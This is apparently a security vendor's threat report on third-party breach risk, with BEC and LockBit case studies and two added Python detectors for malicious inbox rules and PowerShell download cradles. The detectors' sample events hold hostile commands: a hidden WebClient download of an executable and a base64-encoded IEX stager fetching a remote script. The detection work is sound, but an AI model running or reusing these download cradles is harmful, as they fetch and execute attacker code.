Key Points

  • Third-party breaches can severely affect customer organizations, leading to financial losses, reputational damage, and operational disruptions.
  • The prevalence of third-party breaches is extremely high, with an estimated 98% of organizations having affiliations with at least one third party that has been breached.
  • Organizations in the healthcare and financial services sectors generally face heightened risks due to greater reliance on third-party services.
  • Threat actors including “Clop” and “LockBit” often use third-party compromise as an attack vector to target other organizations.
  • ReliaQuest uses a variety of proactive methods to detect third-party breaches and has developed automated response plays to quickly contain the threat posed by such breaches in customer environments.

Most organizations work with countless third-party vendors and suppliers in relationships that are not only necessary but also fruitful, contributing to increased revenue, customer retention, and access to outside resources and expertise. In the digital age, the number of these collaborations has surged, offering financial benefit but also presenting significant security challenges. This report will outline the definition and scope of third-party risk, analyze various real-world examples, and provide strategic insights into managing these risks effectively. Additionally, it will detail ReliaQuest’s robust detection and response strategies aimed at protecting organizations from the threat of third-party compromise.

Defining Third-Party Risk

Third-party risk refers to the potential for your organization to be negatively affected if a vendor or supplier is impacted by a cyber incident. The scope of third-party risk is vast, encompassing all the possible impacts of security breaches affecting vendors or suppliers, regardless of scale. Depending on the nature of the third-party breach, the consequences for customer organizations can be diverse, as indicated by the following non-exhaustive examples.

  • A critical function provided by a third party, such as password management or multifactor authentication (MFA), is disabled in a cyber attack, resulting in operational downtime for customer organizations. Such operational downtime can cause both immediate impact to revenue and more intangible damage to trust in the customer organization as clients question the reliability of services.
  • A third party with access to sensitive data is breached, leading to credential or proprietary information exposure for a customer organization. This can cause reputational as well as financial damage to the customer organization, particularly if the third party is in possession of sensitive intellectual property. In the aerospace industry, for example, breaches of third-party parts suppliers have led to leaks of aircraft design schematics, which can then be accessed by competitors.
  • Business email compromise (BEC)—in which a third-party provider’s email account is compromised, or convincingly impersonated, to send malicious email—enables threat actors to carry out highly targeted phishing attacks. Because the messages arrive from a trusted domain, they are highly convincing when attempting to coerce recipients into making payments or disclosing confidential information. The financial or reputational consequences for victim organizations can be severe. In 2015, a US-based IT company lost $46.7 million to a fraud in which threat actors impersonated employees of a third-party company.
  • A third party responsible for storing customer data is breached, leading to compromise of that data. In 2021, for example, details of 8,000 patients were leaked in a breach affecting the cloud services provider of a US-based healthcare provider. These types of breaches can have wide-ranging financial and reputational impacts, depending on the nature of the data compromised.
  • A breach of a third party essential to a customer organization’s supply chain disrupts the organization’s capacity to deliver products or services to its clients. In March 2022, for example, operations were suspended at 14 plants of a Japanese car manufacturer because of a cyberattack on a plastic parts supplier. Although the car manufacturer’s own network was never touched by the breach, the downstream effect on production was severe, with the incident causing an estimated 5% drop in output for the month.

Significance of Third-Party Risk

Whether or not a third-party breach leads to a direct attack on a customer organization, other repercussions—ranging from exposed data and service downtime to supply chain disruptions—can still inflict significant damage. It is estimated that 98% of organizations are affiliated with at least one third party that has suffered a breach, meaning that almost every company is at immediate risk of the direct or indirect consequences of a third-party breach. Multiple threat actors, including “LockBit” and “Clop,” use third-party compromise as an attack vector to reach other organizations; the scale of Clop’s 2023 “MOVEit” campaign, for example, owed much to this vector, since a single vulnerability in the MOVEit Transfer file-transfer product exposed data belonging to the customers of every organization that ran it. The prevalence of third-party breaches is expected to remain high throughout 2024, with certain kinds of breach proving particularly popular. For example, ReliaQuest observed a marked increase in BEC attacks through 2023, driven by advances in technique and the attacks’ profitability, a trend that is likely to continue throughout 2024.

The sheer volume of companies associated with compromised third parties shows that third-party risk is a global problem that can affect organizations in every industry. The risk is particularly pronounced, however, in the healthcare and social assistance and financial services sectors, which tend to depend more heavily on third-party service providers. In the healthcare sector, for example, reliance on external providers for core functions such as data storage means the consequences of third-party breaches can be especially severe, often leading to the release or threatened release of highly sensitive patient data. Recognizing how seriously organizations take third-party compromises, threat actors sometimes allege breaches of major third-party providers to exert pressure on them. For instance, in an incident that began in May 2024, the threat actor “ShinyHunters” claimed to have breached the cloud-services provider Snowflake, demanding a $20 million ransom for data taken from two of Snowflake’s customers. Snowflake maintained that its own platform had not been breached and that the affected customer accounts were accessed with stolen credentials on accounts protected only by single-factor rather than multifactor authentication; the allegations nevertheless caused substantial concern among its customers and sparked ongoing speculation about the validity of the threat actor’s claims.

Why Are Third-Party Providers Targeted?

  • Strategic Access to Multiple Networks: Threat actors including LockBit and Clop often target third-party service providers as a strategic entry point. By breaching a provider, attackers can potentially gain access to the networks of many client companies at once. This significantly increases the reach and impact of a campaign without the need to develop a separate intrusion path for each company, making it an effective strategy that maximizes a threat actor’s resources. One notable example was the 2023 Lazarus Group campaign that distributed a trojanized version of the 3CX DesktopApp, putting the roughly 600,000 organizations using that product at risk of compromise.
  • Exploiting Weaker Security Postures: In some instances, threat actors intentionally target third-party providers that have weaker security postures compared to their more secure clients. This method allows attackers to bypass the robust defenses of a large organization by first infiltrating a less secure third party that has trusted access to the larger organization’s network. Once a third party is breached, the attackers can either access proprietary information entrusted to the third party, or move laterally to attack the main target, facilitating a breach that might otherwise be too challenging or resource intensive. Examples of these kinds of breaches include LockBit targeting a US aerospace company via a third-party manufacturer and DoppelPaymer targeting aerospace firms via a parts supplier.
  • Opportunistic Attacks: While many third-party breaches are strategic, some may be more opportunistic. Attackers might target a third-party provider primarily to exploit that company’s own assets, data, or resources. In these cases, any subsequent impact on the third party’s clients is collateral rather than the primary intent. This type of attack underscores the inherent vulnerabilities that exist when organizations rely on external partners, highlighting the need for comprehensive security assessments of all third-party relationships.

Case Studies

In this section, we examine three case studies highlighting some of the various attack vectors and impacts that characterize third-party breaches. The first two case studies show how third-party breaches posed direct risks to customer environments, while the third extends the focus to the downstream effects of attacks on infrastructure managed by a fourth party.

Storm-1167 Targets Organization with BEC Attack

In October 2023, ReliaQuest uncovered a security incident in which a customer was targeted with over 1,000 phishing emails originating from a compromised third-party business email account. The attack was linked to the “Storm-1167” threat actor, which used a phishing link to lead victims to a fraudulent Microsoft sign-in page that captured their session tokens. Because a session token is issued only after authentication, including any MFA prompt, has completed, replaying a stolen token gave the attacker access to the customer’s internal email and cloud services without needing the victims’ MFA factor again.

A compromised internal account was subsequently used to send a further 1,300 emails carrying a credential harvester, suggesting an attempt to reach higher-privilege accounts and widen the attack’s scope. To delay detection, the threat actor created inbox rules that automatically moved emails containing specific keywords into a designated folder, where the mailbox owner was unlikely to notice them. ReliaQuest escalated the incident, advising the customer to rotate account credentials, block the sender and domain, and clear the phishing emails from recipients’ inboxes.

This incident highlights how business email compromise can produce multi-level breaches: the initial compromise of the third party became the platform for a further phishing campaign against the customer, sent from the third party’s own legitimate domain. Because compromised mailboxes can in turn be used against other entities in a continuing attack chain, third-party breaches of this kind can have far-reaching consequences. Although preventing sophisticated BEC attempts like this is difficult, strong email authentication measures offer the best available defense. Note, however, that mail sent from a compromised account on a legitimate domain passes SPF, DKIM, and DMARC checks, so these controls must be paired with content-based monitoring that can block emails even from trusted domains when they resemble those used in BEC attempts. For emails that do bypass detections, ReliaQuest’s GreyMatter Phishing Analyzer automatically evaluates emails reported as suspicious, removes them, and initiates response actions.
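The inbox-rule tradecraft described in this case study is one of the most reliable post-compromise signals in a BEC intrusion, so it is worth showing what a detection looks like. The Python below is an added example written for this page, not code from the original report or from ReliaQuest. It scores audit records for inbox rules that hide or exfiltrate mail: rules that move matching messages into rarely viewed folders, delete them, mark them read, or forward them outside the organization. The sample records, folder list, keyword list and the example.com domain are constructed assumptions whose shape is only modelled on Exchange Online New-InboxRule/Set-InboxRule entries in the Microsoft 365 Unified Audit Log; the field names are an approximation, not the exact schema.

```python
"""Flag inbox rules that hide or exfiltrate mail, a hallmark of BEC intrusions.

Records are constructed for this example and only modelled on the shape of
Exchange Online New-InboxRule / Set-InboxRule audit entries; field names are
an approximation, not the exact Microsoft 365 schema.
"""
import re

INTERNAL_DOMAIN = "example.com"  # assumption: the organisation's own mail domain
# Folders users seldom open; attackers route mail here so the owner never sees it.
HIDING_FOLDERS = {"rss subscriptions", "rss feeds", "conversation history",
                  "archive", "junk email", "deleted items", "notes"}
# Subjects an attacker hides: replies to the phish, security warnings, finance threads.
SENSITIVE = re.compile(r"\b(invoice|payment|wire|bank|password|mfa|phish|suspicious|"
                       r"hack|hacked|fraud|security|helpdesk|it support)\b", re.I)
EMAIL = re.compile(r"[\w.+-]+@[\w.-]+\.\w+")


def _params(record):
    """Flatten the record's Parameters list into a name -> value dict."""
    return {p["Name"]: p["Value"] for p in record.get("Parameters", [])}


def _true(value):
    return str(value).strip().lower() == "true"


def analyse_rule(record):
    """Return {'severity': 'none'|'medium'|'high', 'reasons': [...]} for one record."""
    if record.get("Operation") not in ("New-InboxRule", "Set-InboxRule"):
        return {"severity": "none", "reasons": []}
    p, reasons = _params(record), []

    name = str(p.get("Name", "")).strip()
    if len(name) <= 2:  # ".", "a" and ",," are classic attacker rule names
        reasons.append(f"suspiciously short rule name {name!r}")

    criteria = " ".join(str(p.get(k, "")) for k in
                        ("SubjectContainsWords", "BodyContainsWords", "SubjectOrBodyContainsWords"))
    keyword_hit = bool(SENSITIVE.search(criteria))

    folder = str(p.get("MoveToFolder", "")).lower()
    deletes = _true(p.get("DeleteMessage"))
    hides = deletes or folder in HIDING_FOLDERS
    if hides:
        action = "deletes" if deletes else f"moves to '{p['MoveToFolder']}'"
        reasons.append(f"{action} matching mail" + (" mentioning sensitive keywords" if keyword_hit else ""))
        if _true(p.get("MarkAsRead")):
            reasons.append("marks hidden mail as read so no unread count appears")

    # Any forward/redirect target outside our own domain is exfiltration.
    external = [a for k in ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")
                for a in EMAIL.findall(str(p.get(k, "")))
                if not a.lower().endswith("@" + INTERNAL_DOMAIN)]
    if external:
        reasons.append("forwards mail outside the organisation: " + ", ".join(external))

    severity = "high" if external or (hides and keyword_hit) else "medium" if reasons else "none"
    return {"severity": severity, "reasons": reasons}


def scan(records):
    """(user, rule name, severity, reasons) for every rule that is not benign."""
    hits = []
    for r in records:
        result = analyse_rule(r)
        if result["severity"] != "none":
            hits.append((r.get("UserId"), _params(r).get("Name"), result["severity"], result["reasons"]))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_RECORDS = [
    {"Operation": "New-InboxRule", "UserId": "finance.user@example.com", "ClientIP": "198.51.100.23",
     "Parameters": [  # attacker hides replies and security mail, as in the Storm-1167 case
         {"Name": "Name", "Value": "."},
         {"Name": "SubjectOrBodyContainsWords", "Value": "invoice;password;suspicious"},
         {"Name": "MoveToFolder", "Value": "RSS Subscriptions"},
         {"Name": "MarkAsRead", "Value": "True"}]},
    {"Operation": "New-InboxRule", "UserId": "finance.user@example.com", "ClientIP": "10.20.30.40",
     "Parameters": [  # ordinary newsletter filing rule
         {"Name": "Name", "Value": "Newsletters"},
         {"Name": "From", "Value": "news@vendor-updates.example.net"},
         {"Name": "MoveToFolder", "Value": "Newsletters"}]},
    {"Operation": "Set-InboxRule", "UserId": "ap.clerk@example.com", "ClientIP": "203.0.113.9",
     "Parameters": [  # silent external forward of anything about payments
         {"Name": "Name", "Value": "Payments"},
         {"Name": "SubjectContainsWords", "Value": "payment;wire"},
         {"Name": "ForwardTo", "Value": "backup.mail@outlook-archive.example.org"}]},
]

if __name__ == "__main__":
    for user, rule, severity, reasons in scan(SAMPLE_RECORDS):
        print(f"{severity.upper():6} {user} rule={rule!r}: {'; '.join(reasons)}")
```

The scoring deliberately treats a keyword filter as benign on its own and only raises severity when it is combined with a hiding action or an external forward; that combination is what separates an attacker's rule from a user filing newsletters. In production the same logic would run over the real audit feed, and the ClientIP field (unused here) is the natural next pivot: a rule created from an address that never appears in the user's sign-in history is worth escalating even when its actions look mundane.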

LockBit Attempts Breach of Healthcare Organization via Compromised Third-Party Account

In October 2023, ReliaQuest detected a user at a customer in the healthcare and social assistance sector executing an unusual PowerShell command. Our analysis revealed that the account running the command was a compromised administrator account belonging to a third party.

After compromising the third-party account, the threat actor attempted to download the executable file “cortex.exe” in the customer environment from the IP address 185.212.128[.]41. An endpoint detection and response (EDR) tool blocked this download; however, our analysis indicated that the cortex.exe file was a “LockBit 3.0” executable, related to the LockBit ransomware group. It is highly likely the customer had been targeted by a LockBit ransomware attack via the third party.

After the download was blocked, ReliaQuest took further steps to ensure that the customer environment remained secure. We recommended that the customer isolate the host and terminate any ongoing sessions linked to the compromised account. After mitigating the immediate threat, ReliaQuest advised rotating the user’s credentials and reimaging the affected host. We then blocked all indicators of compromise (IoCs). This ensured that LockBit would no longer be able to use the compromised account to carry out further malicious activities toward the customer, and that if they had discovered any customer credentials during the initial compromise, these would be unusable.

How the third party was compromised in this case is not known; however, targeting third-party providers has become a common strategy for ransomware groups like LockBit and Clop. To reduce the chance of threat groups using this attack vector, organizations should carefully vet vendors and suppliers. To make third-party administrator accounts as hard as possible to abuse, ensure that every such account uses multifactor authentication and that the third party uses unique credentials for each organization it works with, so that a credential stolen from one customer cannot be replayed against another. Apply the principle of least privilege as well: if third parties have access to your environment, they should have access only to the parts of it needed to complete the tasks they are responsible for, and that access should be logged so that unusual activity, such as a vendor administrator account suddenly launching PowerShell downloads, stands out.
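The detection that caught this intrusion, a PowerShell download cradle run by an account that should never launch one, is straightforward to express in code, and doing so also shows how the third-party inventory recommended later in this report feeds directly into detection. The Python below is an added example written for this page, not code from the original report or from ReliaQuest. It scans process-creation events for PowerShell download cradles (WebClient, Invoke-WebRequest, BITS and friends), decodes -EncodedCommand payloads so a cradle hidden in base64 is still seen, extracts the download host and flags it when it lies outside the organization's address space, and raises the severity when the account is a known third-party account. The account list, approved internal hosts, address ranges, DNS suffix and the sample events are all constructed assumptions, and the 203.0.113.0/24 addresses are a documentation range standing in for the real IP from the case.

```python
"""Spot PowerShell download cradles, weighting them by who ran them.

Events are constructed for this example; their fields loosely follow a
process-creation log (User, CommandLine), not an exact Sysmon schema. The
203.0.113.0/24 addresses are a documentation range, not the IP from the case.
"""
import base64
import ipaddress
import re
from urllib.parse import urlparse

# Assumptions about the environment, taken from the third-party inventory.
THIRD_PARTY_ACCOUNTS = {"corp\\vendor-admin", "corp\\svc-msp-backup"}
APPROVED_HOSTS = {"10.0.0.5", "sccm.corp.example.com"}  # allowed to serve installers
INTERNAL_DNS_SUFFIX = ".corp.example.com"
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|invoke-restmethod|\birm\b|"
    r"downloadfile|downloadstring|downloaddata|net\.webclient|"
    r"start-bitstransfer|bitsadmin", re.IGNORECASE)
URL = re.compile(r"(?:https?|ftp)://[^\s'\"`;)]+", re.IGNORECASE)
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".msi", ".scr", ".hta")


def decode_encoded(cmd):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or ''."""
    m = ENCODED.search(cmd)
    if not m:
        return ""
    b64 = m.group(1)
    try:  # binascii.Error is a ValueError subclass
        return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-16-le", "ignore")
    except ValueError:
        return ""


def is_external(host):
    """True unless the host is an approved server or inside our address space."""
    if host in APPROVED_HOSTS:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:  # a hostname rather than an address
        return not host.endswith(INTERNAL_DNS_SUFFIX)
    return not any(ip in net for net in INTERNAL_NETS)


def analyse(event):
    """Return {'severity': 'none'|'medium'|'high', 'reasons': [...]} for one event."""
    user = event.get("User", "").lower()
    raw = event.get("CommandLine", "")
    decoded = decode_encoded(raw)
    cmd = raw + " " + decoded  # scan the raw line and the decoded payload together
    if not CRADLE.search(cmd):
        return {"severity": "none", "reasons": []}

    reasons, external, exe = [], False, False
    if decoded:
        reasons.append("decoded -enc payload: " + decoded.strip()[:50])
    for url in URL.findall(cmd):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if not is_external(host):
            continue  # approved internal source, e.g. the software deployment server
        external = True
        reasons.append(f"download from external host {host}")
        if parsed.path.lower().endswith(EXEC_EXT):
            exe = True
            reasons.append("fetches " + parsed.path.rsplit("/", 1)[-1])
    third_party = user in THIRD_PARTY_ACCOUNTS
    if third_party:
        reasons.append(f"run by third-party account {user}")

    if external and (exe or third_party):
        severity = "high"
    elif reasons:
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity, "reasons": reasons}


def triage(events):
    """(user, severity, reasons) for every event that is not benign."""
    out = []
    for e in events:
        r = analyse(e)
        if r["severity"] != "none":
            out.append((e.get("User"), r["severity"], r["reasons"]))
    return out


# Constructed sample events (not real telemetry).
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.77/stage.ps1')"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"User": "CORP\\vendor-admin",  # third-party admin pulling a binary, as in the case
     "CommandLine": r'''powershell.exe -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://203.0.113.41/cortex.exe','C:\Users\Public\cortex.exe')"'''},
    {"User": "CORP\\itadmin",  # staff fetching an installer from the approved server
     "CommandLine": r'powershell.exe -c "Invoke-WebRequest http://10.0.0.5/agent/installer.msi -OutFile C:\Temp\installer.msi"'},
    {"User": "CORP\\svc-msp-backup",  # vendor service account running an encoded stager
     "CommandLine": "powershell.exe -nop -enc " + _ENC},
]

if __name__ == "__main__":
    for user, severity, reasons in triage(SAMPLE_EVENTS):
        print(f"{severity.upper():6} {user}: {'; '.join(reasons)}")
```

Two design points matter here. First, the external check is an allow-list of your own address space rather than a block-list of bad addresses, because the attacker's infrastructure changes while your RFC 1918 ranges and deployment servers do not. Second, the severity only reaches "high" when an external download is combined with either an executable payload or a third-party account; the second condition is exactly the signal in the case study, and it is only available if the inventory of third-party accounts is maintained.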

Breach of Fourth-Party Provider Impacts Cisco Duo and its Customers

In April 2024, the MFA service provider Cisco Duo informed customers that an unnamed telephony provider that handled Duo’s SMS and voice over IP (VoIP) MFA messages had been compromised on April 1 through a phishing attack on one of the provider’s employees. The threat actor downloaded SMS and VoIP message logs associated with specific Duo accounts. The logs contained the phone number, carrier, location data, date, time, and message type for messages sent to employees of customer organizations, though not the message contents themselves. At the time of writing, it is not known whether threat actors have breached Cisco Duo customer environments using this stolen data.

The Cisco Duo vendor breach underscores the efforts by threat actors to target critical components of corporate security architecture. By focusing on third- and sometimes fourth-party providers, threat actors can exploit the dependencies that corporations have on their service providers, critical for functions like MFA. In this case, the threat actor used phishing to obtain credentials from an employee at a provider for Cisco Duo, highlighting how far outside the control of Cisco Duo customers the incident was.

Best Practices for Managing Third-Party Risk

Effective management of third-party risk is essential for maintaining the security and integrity of an organization’s operations. Third-party risk management is inherently challenging because it involves variables outside an organization’s direct control, necessitating a proactive approach to understanding these risks and preparing strategic responses for potential worst-case scenarios. The best practices detailed here can help organizations mitigate risks associated with their third-party relationships.

  • Identify Third Parties: Organizations should ensure they are aware of who all of their third-party providers are, the functions they perform, the level of access they have to the organization’s systems, and the type of data stored by each party. Gaining clarity on the reach and role of third-party providers is crucial for mapping out the attack surface of your organization, which is in turn essential for building effective defensive strategies.
  • Assess Criticality and Risk: Understanding the criticality of a third party involves assessing its importance to your operations and the impact of its potential failure, while risk evaluation considers both the severity and likelihood of that failure. Evaluating the criticality of third-party entities and understanding their associated risks helps in making informed choices about outsourcing particular tasks or services. For instance, if a third party responsible for a crucial function is deemed high-risk because of a history of not disclosing past cyber incidents, it may be appropriate to transition to a different provider or to explore the feasibility and benefits of managing the function internally.
  • Continuously Monitor: Continuously monitoring the criticality and risk associated with third-party services is essential because these factors are not static; they can change as the global threat environment, internal priorities, and the third-party’s own systems evolve. Relying solely on one-off assessments can lead to gaps in risk management and increase the risk of damaging third-party breaches affecting your organization, as shifts in the cyber threat landscape and third-party performance can occur at any time.
  • Consider Systemic Risks: When a third party provides multiple critical functions, or where multiple organizations in the same sector use a single third-party provider, the risks from incidents involving third parties are compounded. Organizations are encouraged to improve information sharing on third-party relationships and should factor in the extent of a third party’s integration and prevalence within the industry when assessing its risk. One study on the financial sector found that 78% of organizations had experienced a third-party breach over a period of a year, but only 3% of third-party vendors had been breached. This demonstrates how extensive use of third parties and strong reliance on specific providers can lead to systemic risks for an entire sector.
  • Implement Incident Response Plans: Ensure that your organization has established response plans to effectively address reports of third-party breaches and, if necessary, implement remedial actions to secure your environment. Organizations should implement robust systems to ensure that critical functions carried out by external providers can continue in the event of cyber incidents involving third parties. Contingencies could include transferring functions back to the organization or to another third party. To enhance response plans for third-party breaches, organizations can conduct tabletop exercises or workshops, which serve as practical simulations to map out and practice their response strategies. These exercises help identify potential weaknesses in the response plan and provide a forum for team members to familiarize themselves with potential remedial actions during crisis scenarios, thereby improving readiness and response efficacy.

What ReliaQuest Is Doing

ReliaQuest uses multiple methods to detect third-party breaches, while also deploying effective detection, containment, and response mechanisms to protect customers if data compromised in a third-party breach is used to target their environment.

Detecting Third-Party Breaches

Detecting third-party breaches poses a significant challenge, as they often only come to light when they are publicly announced or when compromised data is used in subsequent attempts to breach customer environments. Several factors make this worse. A third party may be reluctant to disclose that it has been compromised, fearing the reputational damage and customer loss that could follow. In addition, there are many situations in which a third party is simply unaware of a breach, particularly if it has been targeted by an advanced persistent threat (APT) group specializing in espionage. In such cases the APT compromises systems but maintains a low profile to avoid detection, quietly gathering sensitive information for use in attacks against other organizations. Sometimes a subsequent cyberattack is never linked back to the compromise of a third party at all. Consider, for example, a customer organization hit by a spear-phishing campaign that uses proprietary information obtained from a third-party breach. If the phishing emails originate from unrelated domains and use this information subtly, without explicit references, pinpointing the origin of the attack becomes almost impossible.

To enhance awareness of third-party compromises, organizations can use ReliaQuest’s Threat News Tippers and Intelligence Updates, which highlight significant breaches reported in the media, including those related to major third-party service providers. In addition, Ransomware Tippers identify organizations that have been listed on leak sites operated by ransomware groups.

For GreyMatter Digital Risk Protection customers, additional functionality is available. This service continuously monitors the open, deep, and dark web, including closed and technical sources, for third-party data breaches relevant to customers, including billions of files exposed through misconfigured S3 buckets, File Transfer Protocol (FTP), rsync, and Server Message Block (SMB) services. In 2023 alone, we discovered over 6 billion exposed credentials in breached data on the clear and dark web, bringing the total we have found to more than 36 billion. Monitoring the clear and dark web in this way ensures that customers are promptly informed not only when third parties are directly breached, but also when inadequate security practices by third parties leave sensitive data accessible to threat actors.

Detection Rules

ReliaQuest is committed to safeguarding our customers against the wide-ranging threats that could arise from third-party compromises. Our detection rules and response plays help defenders react rapidly when threat actors are attempting breaches using data obtained from third-party compromises.